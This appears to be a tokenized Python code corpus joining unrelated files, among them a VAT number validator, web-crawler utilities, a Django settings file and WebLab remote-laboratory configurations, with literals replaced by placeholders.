<EOL> if country_prefix not in ID_PATTERNS : <EOL> return None <EOL> return vat_id <EOL> def validate ( vat_id ) : <EOL> """<STR_LIT>""" <EOL> vat_id = normalize ( vat_id ) <EOL> if not vat_id : <EOL> return vat_id <EOL> country_prefix = vat_id [ <NUM_LIT:0> : <NUM_LIT:2> ] <EOL> number = vat_id [ <NUM_LIT:2> : ] <EOL> if not re . match ( ID_PATTERNS [ country_prefix ] [ '<STR_LIT>' ] , number ) : <EOL> raise InvalidError ( '<STR_LIT>' % country_prefix ) <EOL> if country_prefix == '<STR_LIT>' : <EOL> organization_number = number . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> validation_url = '<STR_LIT>' % organization_number <EOL> try : <EOL> response = urlopen ( validation_url ) <EOL> _ , params = cgi . parse_header ( response . headers [ '<STR_LIT:Content-Type>' ] ) <EOL> if '<STR_LIT>' in params : <EOL> encoding = params [ '<STR_LIT>' ] <EOL> else : <EOL> encoding = '<STR_LIT:utf-8>' <EOL> return_json = response . read ( ) . decode ( encoding ) <EOL> info = json . loads ( return_json ) <EOL> if '<STR_LIT>' not in info or info [ '<STR_LIT>' ] != int ( organization_number ) : <EOL> raise WebServiceError ( '<STR_LIT>' ) <EOL> company_name = info [ '<STR_LIT>' ] <EOL> except ( HTTPError ) as e : <EOL> if e . code == <NUM_LIT> : <EOL> raise InvalidError ( '<STR_LIT>' ) <EOL> raise <EOL> else : <EOL> post_data = '''<STR_LIT>''' % ( country_prefix , number ) <EOL> request = Request ( '<STR_LIT>' ) <EOL> request . add_header ( '<STR_LIT:Content-Type>' , '<STR_LIT>' ) <EOL> try : <EOL> response = urlopen ( request , post_data . encode ( '<STR_LIT:utf-8>' ) ) <EOL> except ( HTTPError ) as e : <EOL> if e . code == <NUM_LIT> : <EOL> raise WebServiceUnavailableError ( '<STR_LIT>' ) <EOL> raise <EOL> _ , params = cgi . parse_header ( response . headers [ '<STR_LIT:Content-Type>' ] ) <EOL> if '<STR_LIT>' in params : <EOL> encoding = params [ '<STR_LIT>' ] <EOL> else : <EOL> encoding = '<STR_LIT:utf-8>' <EOL> return_xml = response . read ( ) . decode ( encoding ) <EOL> try : <EOL> envelope = ElementTree . fromstring ( return_xml . encode ( '<STR_LIT:utf-8>' ) ) <EOL> except ( ElementTree . ParseError ) : <EOL> raise WebServiceError ( '<STR_LIT>' ) <EOL> namespaces = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> valid_elements = envelope . findall ( '<STR_LIT>' , namespaces ) <EOL> if not valid_elements : <EOL> raise WebServiceError ( '<STR_LIT>' ) <EOL> name_elements = envelope . findall ( '<STR_LIT>' , namespaces ) <EOL> if not name_elements : <EOL> raise WebServiceError ( '<STR_LIT>' ) <EOL> if valid_elements [ <NUM_LIT:0> ] . text . lower ( ) != '<STR_LIT:true>' : <EOL> raise InvalidError ( '<STR_LIT>' ) <EOL> company_name = name_elements [ <NUM_LIT:0> ] . text <EOL> return ( ID_PATTERNS [ country_prefix ] [ '<STR_LIT>' ] , vat_id , company_name ) <EOL> ID_PATTERNS = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> } </s>
<s> import sys <EOL> if sys . version_info [ <NUM_LIT:0> ] == <NUM_LIT:2> : <EOL> from urlparse import urlparse <EOL> if urlparse ( '<STR_LIT>' ) . netloc != '<STR_LIT>' : <EOL> from urlparse import uses_netloc <EOL> uses_netloc . append ( '<STR_LIT>' ) <EOL> if urlparse ( '<STR_LIT>' ) . query != '<STR_LIT>' : <EOL> from urlparse import uses_query <EOL> uses_query . append ( '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> from . lxmlhtml import LxmlLinkExtractor as LinkExtractor </s>
<s> from ants . webservice import JsonRpcResource <EOL> class CrawlerResource ( JsonRpcResource ) : <EOL> ws_name = '<STR_LIT>' <EOL> def __init__ ( self , crawler ) : <EOL> JsonRpcResource . __init__ ( self , crawler , crawler ) </s>
<s> """<STR_LIT>""" <EOL> import xmlrpclib <EOL> from ants . http . request import Request <EOL> from ants . utils . python import get_func_args <EOL> DUMPS_ARGS = get_func_args ( xmlrpclib . dumps ) <EOL> class XmlRpcRequest ( Request ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> encoding = kwargs . get ( '<STR_LIT>' , None ) <EOL> if '<STR_LIT:body>' not in kwargs and '<STR_LIT>' in kwargs : <EOL> kw = dict ( ( k , kwargs . pop ( k ) ) for k in DUMPS_ARGS if k in kwargs ) <EOL> kwargs [ '<STR_LIT:body>' ] = xmlrpclib . dumps ( ** kw ) <EOL> kwargs . setdefault ( '<STR_LIT>' , '<STR_LIT:POST>' ) <EOL> kwargs . setdefault ( '<STR_LIT>' , True ) <EOL> if encoding is not None : <EOL> kwargs [ '<STR_LIT>' ] = encoding <EOL> super ( XmlRpcRequest , self ) . __init__ ( * args , ** kwargs ) <EOL> self . headers . setdefault ( '<STR_LIT:Content-Type>' , '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> import pprint <EOL> from ants . utils import log <EOL> class StatsCollector ( object ) : <EOL> def __init__ ( self , crawler ) : <EOL> self . _dump = crawler . settings . getbool ( '<STR_LIT>' ) <EOL> self . _stats = { } <EOL> def get_value ( self , key , default = None , spider = None ) : <EOL> return self . _stats . get ( key , default ) <EOL> def get_stats ( self , spider = None ) : <EOL> return self . _stats <EOL> def set_value ( self , key , value , spider = None ) : <EOL> self . _stats [ key ] = value <EOL> def set_stats ( self , stats , spider = None ) : <EOL> self . _stats = stats <EOL> def inc_value ( self , key , count = <NUM_LIT:1> , start = <NUM_LIT:0> , spider = None ) : <EOL> d = self . _stats <EOL> d [ key ] = d . setdefault ( key , start ) + count <EOL> def max_value ( self , key , value , spider = None ) : <EOL> self . _stats [ key ] = max ( self . _stats . setdefault ( key , value ) , value ) <EOL> def min_value ( self , key , value , spider = None ) : <EOL> self . _stats [ key ] = min ( self . _stats . setdefault ( key , value ) , value ) <EOL> def clear_stats ( self , spider = None ) : <EOL> self . _stats . clear ( ) <EOL> def open_spider ( self , spider ) : <EOL> pass <EOL> def close_spider ( self , spider , reason ) : <EOL> if self . _dump : <EOL> log . spider_log ( "<STR_LIT>" + pprint . pformat ( self . _stats ) , <EOL> spider = spider ) <EOL> self . _persist_stats ( self . _stats , spider ) <EOL> def _persist_stats ( self , stats , spider ) : <EOL> pass <EOL> class MemoryStatsCollector ( StatsCollector ) : <EOL> def __init__ ( self , crawler ) : <EOL> super ( MemoryStatsCollector , self ) . __init__ ( crawler ) <EOL> self . spider_stats = { } <EOL> def _persist_stats ( self , stats , spider ) : <EOL> self . spider_stats [ spider . name ] = stats <EOL> class DummyStatsCollector ( StatsCollector ) : <EOL> def get_value ( self , key , default = None , spider = None ) : <EOL> return default <EOL> def set_value ( self , key , value , spider = None ) : <EOL> pass <EOL> def set_stats ( self , stats , spider = None ) : <EOL> pass <EOL> def inc_value ( self , key , count = <NUM_LIT:1> , start = <NUM_LIT:0> , spider = None ) : <EOL> pass <EOL> def max_value ( self , key , value , spider = None ) : <EOL> pass <EOL> def min_value ( self , key , value , spider = None ) : <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> import lxml . etree <EOL> class Sitemap ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , xmltext ) : <EOL> xmlp = lxml . etree . XMLParser ( recover = True , remove_comments = True , resolve_entities = False ) <EOL> self . _root = lxml . etree . fromstring ( xmltext , parser = xmlp ) <EOL> rt = self . _root . tag <EOL> self . type = self . _root . tag . split ( '<STR_LIT:}>' , <NUM_LIT:1> ) [ <NUM_LIT:1> ] if '<STR_LIT:}>' in rt else rt <EOL> def __iter__ ( self ) : <EOL> for elem in self . _root . getchildren ( ) : <EOL> d = { } <EOL> for el in elem . getchildren ( ) : <EOL> tag = el . tag <EOL> name = tag . split ( '<STR_LIT:}>' , <NUM_LIT:1> ) [ <NUM_LIT:1> ] if '<STR_LIT:}>' in tag else tag <EOL> if name == '<STR_LIT>' : <EOL> if '<STR_LIT>' in el . attrib : <EOL> d . setdefault ( '<STR_LIT>' , [ ] ) . append ( el . get ( '<STR_LIT>' ) ) <EOL> else : <EOL> d [ name ] = el . text . strip ( ) if el . text else '<STR_LIT>' <EOL> if '<STR_LIT>' in d : <EOL> yield d <EOL> def sitemap_urls_from_robots ( robots_text ) : <EOL> """<STR_LIT>""" <EOL> for line in robots_text . splitlines ( ) : <EOL> if line . lstrip ( ) . startswith ( '<STR_LIT>' ) : <EOL> yield line . split ( '<STR_LIT::>' , <NUM_LIT:1> ) [ <NUM_LIT:1> ] . strip ( ) </s>
<s> from gitpandas . utilities . plotting import plot_cumulative_blame <EOL> from gitpandas import GitHubProfile , ProjectDirectory <EOL> __author__ = '<STR_LIT>' <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> g = ProjectDirectory ( working_dir = [ '<STR_LIT>' ] ) <EOL> blame = g . cumulative_blame ( branch = '<STR_LIT>' , extensions = [ '<STR_LIT>' , '<STR_LIT:html>' , '<STR_LIT>' , '<STR_LIT>' ] , by = '<STR_LIT>' , limit = None , skip = None ) <EOL> plot_cumulative_blame ( blame ) </s>
<s> DEBUG = True <EOL> TEMPLATE_DEBUG = DEBUG <EOL> ADMINS = ( <EOL> ) <EOL> MANAGERS = ADMINS <EOL> DATABASES = { <EOL> '<STR_LIT:default>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> } <EOL> ALLOWED_HOSTS = [ ] <EOL> TIME_ZONE = '<STR_LIT>' <EOL> LANGUAGE_CODE = '<STR_LIT>' <EOL> SITE_ID = <NUM_LIT:1> <EOL> USE_I18N = True <EOL> USE_L10N = True <EOL> USE_TZ = True <EOL> MEDIA_ROOT = '<STR_LIT>' <EOL> MEDIA_URL = '<STR_LIT>' <EOL> STATIC_ROOT = '<STR_LIT>' <EOL> STATIC_URL = '<STR_LIT>' <EOL> STATICFILES_DIRS = ( <EOL> ) <EOL> STATICFILES_FINDERS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> SECRET_KEY = '<STR_LIT>' <EOL> TEMPLATE_LOADERS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> MIDDLEWARE_CLASSES = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> ROOT_URLCONF = '<STR_LIT>' <EOL> WSGI_APPLICATION = '<STR_LIT>' <EOL> TEMPLATE_DIRS = ( <EOL> ) <EOL> INSTALLED_APPS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> LOGGING = { <EOL> '<STR_LIT:version>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT:class>' : '<STR_LIT>' <EOL> } <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> } , <EOL> } <EOL> } </s>
<s> xilinx_board_type = '<STR_LIT>' <EOL> weblab_xilinx_experiment_port_number = <NUM_LIT:1> <EOL> xilinx_home = "<STR_LIT:.>" <EOL> xilinx_impact_full_path = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> xilinx_programmer_type = '<STR_LIT>' <EOL> xilinx_device_to_send_commands = '<STR_LIT>' <EOL> xilinx_jtag_blazer_jbmanager_svf2jsvf_full_path = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> xilinx_jtag_blazer_jbmanager_target_full_path = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> xilinx_jtag_blazer_device_ip_PLD = "<STR_LIT>" <EOL> xilinx_http_device_ip_PLD = "<STR_LIT>" <EOL> xilinx_http_device_port_PLD = <NUM_LIT> <EOL> xilinx_http_device_app_PLD = "<STR_LIT>" <EOL> xilinx_batch_content_PLD = """<STR_LIT>""" <EOL> pld_webcam_url = '''<STR_LIT>''' </s>
<s> laboratory_assigned_experiments = { <EOL> '<STR_LIT>' : <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( ) <EOL> } , <EOL> '<STR_LIT>' : <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( ) <EOL> } , <EOL> '<STR_LIT>' : <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( ) <EOL> } , <EOL> '<STR_LIT>' : <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( ) , <EOL> } , <EOL> '<STR_LIT>' : <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( ) , <EOL> } , <EOL> '<STR_LIT>' : <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( ) , <EOL> } , <EOL> '<STR_LIT>' : <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( ) , <EOL> } , <EOL> '<STR_LIT>' : <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( ) <EOL> } , <EOL> '<STR_LIT>' : <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( ) <EOL> } , <EOL> '<STR_LIT>' : <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( ) <EOL> } , <EOL> '<STR_LIT>' : <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( ) <EOL> } , <EOL> '<STR_LIT>' : <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( ) <EOL> } , <EOL> '<STR_LIT>' : <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( ) <EOL> } , <EOL> '<STR_LIT>' : <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( ) <EOL> } , <EOL> '<STR_LIT>' : <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( ) <EOL> } , <EOL> '<STR_LIT>' : <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( ) <EOL> } , <EOL> '<STR_LIT>' : <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( ) <EOL> } , <EOL> '<STR_LIT>' : <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( ) <EOL> } , <EOL> '<STR_LIT>' : <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( ) <EOL> } , <EOL> '<STR_LIT>' : <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( ) <EOL> } , <EOL> '<STR_LIT>' : <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( ) <EOL> } , <EOL> '<STR_LIT>' : <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( ) <EOL> } , <EOL> '<STR_LIT>' : <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( ) <EOL> } , <EOL> '<STR_LIT>' : <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( ) <EOL> } , <EOL> '<STR_LIT>' : <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( ) <EOL> } , <EOL> '<STR_LIT>' : <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( ) <EOL> } , <EOL> '<STR_LIT>' : <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( ) <EOL> } , <EOL> '<STR_LIT>' : <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( ) <EOL> } , <EOL> '<STR_LIT>' : <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( ) <EOL> } , <EOL> '<STR_LIT>' : <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( ) <EOL> } , <EOL> '<STR_LIT>' : <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( ) <EOL> } , <EOL> '<STR_LIT>' : <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( ) <EOL> } , <EOL> '<STR_LIT>' : <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( ) <EOL> } , <EOL> '<STR_LIT>' : <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( ) <EOL> } , <EOL> '<STR_LIT>' : <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( ) <EOL> } , <EOL> '<STR_LIT>' : <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( ) <EOL> } , <EOL> '<STR_LIT>' : <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( ) <EOL> } , <EOL> '<STR_LIT>' : <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( ) <EOL> } , <EOL> '<STR_LIT>' : <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( ) <EOL> } , <EOL> '<STR_LIT>' : <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( ) <EOL> } , <EOL> '<STR_LIT>' : <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( ) <EOL> } , <EOL> '<STR_LIT>' : <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( ) <EOL> } , <EOL> '<STR_LIT>' : <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( ) <EOL> } , <EOL> '<STR_LIT>' : <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( ) <EOL> } , <EOL> '<STR_LIT>' : <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( ) <EOL> } , <EOL> '<STR_LIT>' : <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( ) <EOL> } , <EOL> '<STR_LIT>' : <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( ) <EOL> } , <EOL> '<STR_LIT>' : <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( ) <EOL> } , <EOL> '<STR_LIT>' : <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( ) , <EOL> '<STR_LIT>' : True , <EOL> } , <EOL> '<STR_LIT>' : <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( ) <EOL> } , <EOL> '<STR_LIT>' : <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( ) <EOL> } , <EOL> '<STR_LIT>' : <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( ) <EOL> } , <EOL> '<STR_LIT>' : <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( ) , <EOL> '<STR_LIT>' : True , <EOL> } , <EOL> } </s>
<s> xilinx_home = "<STR_LIT:.>" <EOL> xilinx_impact_full_path = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> xilinx_batch_content_FPGA = """<STR_LIT>""" <EOL> weblab_xilinx_experiment_xilinx_device = '<STR_LIT>' <EOL> weblab_xilinx_experiment_port_number = <NUM_LIT:1> </s>
<s> import weblab . experiment . experiment as Experiment <EOL> from voodoo . override import Override <EOL> from voodoo . log import logged <EOL> import json <EOL> import urllib2 <EOL> class RoMIEBlocklyExperiment ( Experiment . Experiment ) : <EOL> def __init__ ( self , coord_address , locator , cfg_manager , * args , ** kwargs ) : <EOL> super ( RoMIEBlocklyExperiment , self ) . __init__ ( * args , ** kwargs ) <EOL> self . _cfg_manager = cfg_manager <EOL> self . read_base_config ( ) <EOL> def read_base_config ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> @ Override ( Experiment . Experiment ) <EOL> @ logged ( "<STR_LIT:info>" ) <EOL> def do_get_api ( self ) : <EOL> return "<STR_LIT:2>" <EOL> @ Override ( Experiment . Experiment ) <EOL> @ logged ( "<STR_LIT:info>" ) <EOL> def do_start_experiment ( self , client_initial_data , server_initial_data ) : <EOL> """<STR_LIT>""" <EOL> if ( self . _cfg_manager . get_value ( '<STR_LIT>' ) ) : <EOL> print "<STR_LIT>" <EOL> return json . dumps ( { "<STR_LIT>" : client_initial_data } ) <EOL> @ Override ( Experiment . Experiment ) <EOL> @ logged ( "<STR_LIT:info>" ) <EOL> def do_send_command_to_device ( self , command ) : <EOL> """<STR_LIT>""" <EOL> if ( self . _cfg_manager . get_value ( '<STR_LIT>' ) ) : <EOL> print "<STR_LIT>" % command <EOL> command = json . loads ( command ) <EOL> response = None <EOL> tag = None <EOL> if command [ '<STR_LIT>' ] == '<STR_LIT:F>' : <EOL> response = urllib2 . urlopen ( self . _cfg_manager . get_value ( '<STR_LIT>' ) + '<STR_LIT:f>' , timeout = <NUM_LIT> ) . read ( ) <EOL> if '<STR_LIT>' in response : <EOL> tag = response [ <NUM_LIT:5> : <NUM_LIT> ] . replace ( '<STR_LIT:U+0020>' , '<STR_LIT::>' ) <EOL> elif command [ '<STR_LIT>' ] == '<STR_LIT:L>' : <EOL> response = urllib2 . urlopen ( self . _cfg_manager . get_value ( '<STR_LIT>' ) + '<STR_LIT:l>' , timeout = <NUM_LIT> ) . read ( ) <EOL> elif command [ '<STR_LIT>' ] == '<STR_LIT:R>' : <EOL> response = urllib2 . urlopen ( self . _cfg_manager . get_value ( '<STR_LIT>' ) + '<STR_LIT:r>' , timeout = <NUM_LIT> ) . read ( ) <EOL> elif command [ '<STR_LIT>' ] == '<STR_LIT:S>' : <EOL> response = urllib2 . urlopen ( self . _cfg_manager . get_value ( '<STR_LIT>' ) + '<STR_LIT:s>' , timeout = <NUM_LIT> ) . read ( ) <EOL> if '<STR_LIT>' in response and '<STR_LIT:0>' in response : <EOL> response = False <EOL> elif '<STR_LIT>' in response and '<STR_LIT:1>' in response : <EOL> response = True <EOL> else : <EOL> return "<STR_LIT>" <EOL> if response is not None : <EOL> return json . dumps ( { "<STR_LIT>" : response , "<STR_LIT>" : tag } ) <EOL> return "<STR_LIT>" <EOL> @ Override ( Experiment . Experiment ) <EOL> @ logged ( "<STR_LIT:info>" ) <EOL> def do_dispose ( self ) : <EOL> """<STR_LIT>""" <EOL> if ( self . _cfg_manager . get_value ( '<STR_LIT>' ) ) : <EOL> print "<STR_LIT>" <EOL> return "<STR_LIT:OK>" </s>
<s> from __future__ import print_function , unicode_literals <EOL> laboratory_assigned_experiments = { <EOL> '<STR_LIT>' : <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( ) <EOL> } , <EOL> '<STR_LIT>' : <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( ) <EOL> } , <EOL> } </s>
